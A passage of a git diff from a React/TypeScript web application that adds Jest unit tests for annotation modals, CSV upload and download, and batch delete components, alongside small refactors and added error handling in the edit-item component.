+ expect(onAdd).toHaveBeenCalledWith({ question: 'Question value', answer: 'Answer value' }) + }) + + test('should reset fields after saving when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + const createNextToggle = screen.getByText('appAnnotation.addModal.createNext').previousElementSibling as HTMLElement + fireEvent.click(createNextToggle) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + await waitFor(() => { + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('') + }) + }) + + test('should show toast when validation fails for missing question', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.queryRequired', + })) + }) + + test('should show toast when validation fails for missing answer', () => { + render() + typeQuestion('Filled question') + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.answerRequired', + })) + }) + + test('should close modal when save completes and create next unchecked', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Q') + typeAnswer('A') + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(baseProps.onHide).toHaveBeenCalled() + }) + + test('should allow cancel button to close the drawer', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + expect(baseProps.onHide).toHaveBeenCalled() + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.tsx b/web/app/components/app/annotation/add-annotation-modal/index.tsx index 274a57adf1..0ae4439531 100644 --- a/web/app/components/app/annotation/add-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/add-annotation-modal/index.tsx @@ -101,7 +101,7 @@ const AddAnnotationModal: FC = ({
- setIsCreateNext(!isCreateNext)} /> + setIsCreateNext(!isCreateNext)} />
{t('appAnnotation.addModal.createNext')}
diff --git a/web/app/components/app/annotation/batch-action.spec.tsx b/web/app/components/app/annotation/batch-action.spec.tsx new file mode 100644 index 0000000000..36440fc044 --- /dev/null +++ b/web/app/components/app/annotation/batch-action.spec.tsx @@ -0,0 +1,42 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchAction from './batch-action' + +describe('BatchAction', () => { + const baseProps = { + selectedIds: ['1', '2', '3'], + onBatchDelete: jest.fn(), + onCancel: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should show the selected count and trigger cancel action', () => { + render() + + expect(screen.getByText('3')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + expect(baseProps.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should confirm before running batch delete', async () => { + const onBatchDelete = jest.fn().mockResolvedValue(undefined) + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.delete' })) + await screen.findByText('appAnnotation.list.delete.title') + + await act(async () => { + fireEvent.click(screen.getAllByRole('button', { name: 'common.operation.delete' })[1]) + }) + + await waitFor(() => { + expect(onBatchDelete).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-action.tsx b/web/app/components/app/annotation/batch-action.tsx index 6e80d0c4c8..6ff392d17e 100644 --- a/web/app/components/app/annotation/batch-action.tsx +++ b/web/app/components/app/annotation/batch-action.tsx @@ -3,7 +3,7 @@ import { RiDeleteBinLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { useBoolean } from 'ahooks' import Divider from '@/app/components/base/divider' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Confirm from '@/app/components/base/confirm' const i18nPrefix = 'appAnnotation.batchAction' @@ -38,7 +38,7 @@ const BatchAction: FC = ({ setIsNotDeleting() } return ( -
+
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx new file mode 100644 index 0000000000..7d360cfc1b --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx @@ -0,0 +1,72 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import CSVDownload from './csv-downloader' +import I18nContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { Locale } from '@/i18n-config' + +const downloaderProps: any[] = [] + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: jest.fn(() => ({ + CSVDownloader: ({ children, ...props }: any) => { + downloaderProps.push(props) + return
{children}
+ }, + Type: { Link: 'link' }, + })), +})) + +const renderWithLocale = (locale: Locale) => { + return render( + + + , + ) +} + +describe('CSVDownload', () => { + const englishTemplate = [ + ['question', 'answer'], + ['question1', 'answer1'], + ['question2', 'answer2'], + ] + const chineseTemplate = [ + ['问题', '答案'], + ['问题 1', '答案 1'], + ['问题 2', '答案 2'], + ] + + beforeEach(() => { + downloaderProps.length = 0 + }) + + it('should render the structure preview and pass English template data by default', () => { + renderWithLocale('en-US' as Locale) + + expect(screen.getByText('share.generation.csvStructureTitle')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchModal.template')).toBeInTheDocument() + + expect(downloaderProps[0]).toMatchObject({ + filename: 'template-en-US', + type: 'link', + bom: true, + data: englishTemplate, + }) + }) + + it('should switch to the Chinese template when locale matches the secondary language', () => { + const locale = LanguagesSupported[1] as Locale + renderWithLocale(locale) + + expect(downloaderProps[0]).toMatchObject({ + filename: `template-${locale}`, + data: chineseTemplate, + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx new file mode 100644 index 0000000000..d94295c31c --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx @@ -0,0 +1,115 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CSVUploader, { type Props } from './csv-uploader' +import { ToastContext } from '@/app/components/base/toast' + +describe('CSVUploader', () => { + const notify = jest.fn() + const updateFile = jest.fn() + + const getDropElements = () => { + const title = screen.getByText('appAnnotation.batchModal.csvUploadTitle') + const dropZone = title.parentElement?.parentElement as HTMLDivElement | null + if (!dropZone || !dropZone.parentElement) + throw new Error('Drop zone not found') + const dropContainer = dropZone.parentElement as HTMLDivElement + return { dropZone, dropContainer } + } + + const renderComponent = (props?: Partial) => { + const mergedProps: Props = { + file: undefined, + updateFile, + ...props, + } + return render( + + + , + ) + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should open the file picker when clicking browse', () => { + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.batchModal.browse')) + + expect(clickSpy).toHaveBeenCalledTimes(1) + clickSpy.mockRestore() + }) + + it('should toggle dragging styles and upload the dropped file', async () => { + const file = new File(['content'], 'input.csv', { type: 'text/csv' }) + renderComponent() + const { dropZone, dropContainer } = getDropElements() + + fireEvent.dragEnter(dropContainer) + expect(dropZone.className).toContain('border-components-dropzone-border-accent') + expect(dropZone.className).toContain('bg-components-dropzone-bg-accent') + + fireEvent.drop(dropContainer, { dataTransfer: { files: [file] } }) + + await waitFor(() => expect(updateFile).toHaveBeenCalledWith(file)) + expect(dropZone.className).not.toContain('border-components-dropzone-border-accent') + }) + + it('should ignore drop events without dataTransfer', () => { + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer) + + expect(updateFile).not.toHaveBeenCalled() + }) + + it('should show an error when multiple files are dropped', async () => { + const fileA = new File(['a'], 'a.csv', { type: 'text/csv' }) + const fileB = new File(['b'], 'b.csv', { type: 'text/csv' }) + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer, { dataTransfer: { files: [fileA, fileB] } }) + + await waitFor(() => expect(notify).toHaveBeenCalledWith({ + type: 'error', + message: 'datasetCreation.stepOne.uploader.validation.count', + })) + expect(updateFile).not.toHaveBeenCalled() + }) + + it('should propagate file selection changes through input change event', () => { + const file = new File(['row'], 'selected.csv', { type: 'text/csv' }) + const { container } = renderComponent() + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + fireEvent.change(fileInput, { target: { files: [file] } }) + + expect(updateFile).toHaveBeenCalledWith(file) + }) + + it('should render selected file details and allow change/removal', () => { + const file = new File(['data'], 'report.csv', { type: 'text/csv' }) + const { container } = renderComponent({ file }) + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + expect(screen.getByText('report')).toBeInTheDocument() + expect(screen.getByText('.csv')).toBeInTheDocument() + + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + fireEvent.click(screen.getByText('datasetCreation.stepOne.uploader.change')) + expect(clickSpy).toHaveBeenCalled() + clickSpy.mockRestore() + + const valueSetter = jest.spyOn(fileInput, 'value', 'set') + const removeTrigger = screen.getByTestId('remove-file-button') + fireEvent.click(removeTrigger) + + expect(updateFile).toHaveBeenCalledWith() + expect(valueSetter).toHaveBeenCalledWith('') + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx index b98eb815f9..c9766135df 100644 --- a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx @@ -4,7 +4,7 @@ import React, { useEffect, useRef, useState } from 'react' import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' import { RiDeleteBinLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Csv as CSVIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import Button from '@/app/components/base/button' @@ -114,7 +114,7 @@ const CSVUploader: FC = ({
-
+
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..5527340895 --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx @@ -0,0 +1,164 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchModal, { ProcessStatus } from './index' +import { useProviderContext } from '@/context/provider-context' +import { annotationBatchImport, checkAnnotationBatchImportProgress } from '@/service/annotation' +import type { IBatchModalProps } from './index' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(), + }, +})) + +jest.mock('@/service/annotation', () => ({ + annotationBatchImport: jest.fn(), + checkAnnotationBatchImportProgress: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./csv-downloader', () => ({ + __esModule: true, + default: () =>
, +})) + +let lastUploadedFile: File | undefined + +jest.mock('./csv-uploader', () => ({ + __esModule: true, + default: ({ file, updateFile }: { file?: File; updateFile: (file?: File) => void }) => ( +
+ + {file && {file.name}} +
+ ), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +const mockNotify = Toast.notify as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock +const annotationBatchImportMock = annotationBatchImport as jest.Mock +const checkAnnotationBatchImportProgressMock = checkAnnotationBatchImportProgress as jest.Mock + +const renderComponent = (props: Partial = {}) => { + const mergedProps: IBatchModalProps = { + appId: 'app-id', + isShow: true, + onCancel: jest.fn(), + onAdded: jest.fn(), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('BatchModal', () => { + beforeEach(() => { + jest.clearAllMocks() + lastUploadedFile = undefined + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should disable run action and show billing hint when annotation quota is full', () => { + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 10 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }) + + renderComponent() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'appAnnotation.batchModal.run' })).toBeDisabled() + }) + + it('should reset uploader state when modal closes and allow manual cancellation', () => { + const { rerender, props } = renderComponent() + + fireEvent.click(screen.getByTestId('mock-uploader')) + expect(screen.getByTestId('selected-file')).toHaveTextContent('batch.csv') + + rerender() + rerender() + + expect(screen.queryByTestId('selected-file')).toBeNull() + + fireEvent.click(screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' })) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should submit the csv file, poll status, and notify when import completes', async () => { + jest.useFakeTimers() + const { props } = renderComponent() + const fileTrigger = screen.getByTestId('mock-uploader') + fireEvent.click(fileTrigger) + + const runButton = screen.getByRole('button', { name: 'appAnnotation.batchModal.run' }) + expect(runButton).not.toBeDisabled() + + annotationBatchImportMock.mockResolvedValue({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + checkAnnotationBatchImportProgressMock + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.COMPLETED }) + + await act(async () => { + fireEvent.click(runButton) + }) + + await waitFor(() => { + expect(annotationBatchImportMock).toHaveBeenCalledTimes(1) + }) + + const formData = annotationBatchImportMock.mock.calls[0][0].body as FormData + expect(formData.get('file')).toBe(lastUploadedFile) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(1) + }) + + await act(async () => { + jest.runOnlyPendingTimers() + }) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(2) + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'success', + message: 'appAnnotation.batchModal.completed', + }) + expect(props.onAdded).toHaveBeenCalledTimes(1) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + jest.useRealTimers() + }) +}) diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..95a5586292 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,466 @@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import EditItem, { EditItemType, EditTitle } from './index' + +describe('EditTitle', () => { + it('should render title content correctly', () => { + // Arrange + const props = { title: 'Test Title' } + + // Act + render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + // Should contain edit icon (svg element) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should apply custom className when provided', () => { + // Arrange + const props = { + title: 'Test Title', + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) +}) + +describe('EditItem', () => { + const defaultProps = { + type: EditItemType.Query, + content: 'Test content', + onSave: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render content correctly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + // Should show item name (query or answer) + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + + it('should render different item types correctly', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Answer, + content: 'Answer content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/answer content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument() + }) + + it('should show edit controls when not readonly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should hide edit controls when readonly', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should respect readonly prop for edit functionality', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + + it('should display provided content', () => { + // Arrange + const props = { + ...defaultProps, + content: 'Custom content for testing', + } + + // Act + render() + + // Assert + expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument() + }) + + it('should render appropriate content based on type', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Query, + content: 'Question content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/question content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should activate edit mode when edit button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + }) + + it('should save new content when save button is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Type new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Updated content') + }) + + it('should exit edit mode when cancel button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText(/test content/i)).toBeInTheDocument() + }) + + it('should show content preview while typing', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Assert + expect(screen.getByText(/new content/i)).toBeInTheDocument() + }) + + it('should call onSave with correct content when saving', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Test save content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Test save content') + }) + + it('should show delete option and restore original content when delete is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and change content + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to trigger content change + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(await screen.findByText('common.operation.delete')).toBeInTheDocument() + + await user.click(screen.getByText('common.operation.delete')) + + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + + it('should handle keyboard interactions in edit mode', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + + // Test typing + await user.type(textarea, 'Keyboard test') + + // Assert + expect(textarea).toHaveValue('Keyboard test') + expect(screen.getByText(/keyboard test/i)).toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should reset newContent when content prop changes', async () => { + // Arrange + const { rerender } = render() + + // Act - Enter edit mode and type something + const user = userEvent.setup() + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New content') + + // Rerender with new content prop + rerender() + + // Assert - Textarea value should be reset due to useEffect + expect(textarea).toHaveValue('') + }) + + it('should preserve edit state across content changes', async () => { + // Arrange + const { rerender } = render() + const user = userEvent.setup() + + // Act - Enter edit mode + await user.click(screen.getByText('common.operation.edit')) + + // Rerender with new content + rerender() + + // Assert - Should still be in edit mode + expect(screen.getByRole('textbox')).toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty content', () => { + // Arrange + const props = { + ...defaultProps, + content: '', + } + + // Act + const { container } = render() + + // Assert - Should render without crashing + // Check that the component renders properly with empty content + expect(container.querySelector('.grow')).toBeInTheDocument() + // Should still show edit button + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longContent = 'A'.repeat(1000) + const props = { + ...defaultProps, + content: longContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + + it('should handle content with special characters', () => { + // Arrange + const specialContent = 'Content with & < > " \' characters' + const props = { + ...defaultProps, + content: specialContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialContent)).toBeInTheDocument() + }) + + it('should handle rapid edit/cancel operations', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Rapid edit/cancel operations + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText('Test content')).toBeInTheDocument() + }) + + it('should handle save failure gracefully in edit mode', async () => { + // Arrange + const mockSave = jest.fn().mockRejectedValueOnce(new Error('Save failed')) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and save (should fail) + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Save should fail but not throw + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert - Should remain in edit mode when save fails + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(mockSave).toHaveBeenCalledWith('New content') + }) + + it('should handle delete action failure gracefully', async () => { + // Arrange + const mockSave = jest.fn() + .mockResolvedValueOnce(undefined) // First save succeeds + .mockRejectedValueOnce(new Error('Delete failed')) // Delete fails + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Edit content to show delete button + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to create new content + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + await screen.findByText('common.operation.delete') + + // Click delete (should fail but not throw) + await user.click(screen.getByText('common.operation.delete')) + + // Assert - Delete action should handle error gracefully + expect(mockSave).toHaveBeenCalledTimes(2) + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + + // When delete fails, the delete button should still be visible (state not changed) + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + expect(screen.getByText('Modified content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx index e808d0b48a..6ba830967d 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx @@ -6,7 +6,7 @@ import { RiDeleteBinLine, RiEditFill, RiEditLine } from '@remixicon/react' import { Robot, User } from '@/app/components/base/icons/src/public/avatar' import Textarea from '@/app/components/base/textarea' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export enum EditItemType { Query = 'query', @@ -52,8 +52,14 @@ const EditItem: FC = ({ }, [content]) const handleSave = async () => { - await onSave(newContent) - setIsEdit(false) + try { + await onSave(newContent) + setIsEdit(false) + } + catch { + // Keep edit mode open when save fails + // Error notification is handled by the parent component + } } const handleCancel = () => { @@ -96,9 +102,16 @@ const EditItem: FC = ({
·
{ - setNewContent(content) - onSave(content) + onClick={async () => { + try { + await onSave(content) + // Only update UI state after successful delete + setNewContent(content) + } + catch { + // Delete action failed - error is already handled by parent + // UI state remains unchanged, user can retry + } }} >
diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..bdc991116c --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx @@ -0,0 +1,680 @@ +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast' +import EditAnnotationModal from './index' + +// Mock only external dependencies +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + editAnnotation: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 5 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }), +})) + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: () => '2023-12-01 10:30:00', + }), +})) + +// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type ToastNotifyProps = Pick +type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle } +const toastWithNotify = Toast as unknown as ToastWithNotify +const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() }) + +const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as { + addAnnotation: jest.Mock + editAnnotation: jest.Mock +} + +describe('EditAnnotationModal', () => { + const defaultProps = { + isShow: true, + onHide: jest.fn(), + appId: 'test-app-id', + query: 'Test query', + answer: 'Test answer', + onEdited: jest.fn(), + onAdded: jest.fn(), + onRemove: jest.fn(), + } + + afterAll(() => { + toastNotifySpy.mockRestore() + }) + + beforeEach(() => { + jest.clearAllMocks() + mockAddAnnotation.mockResolvedValue({ + id: 'test-id', + account: { name: 'Test User' }, + }) + mockEditAnnotation.mockResolvedValue({}) + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render modal when isShow is true', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Check for modal title as it appears in the mock + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + 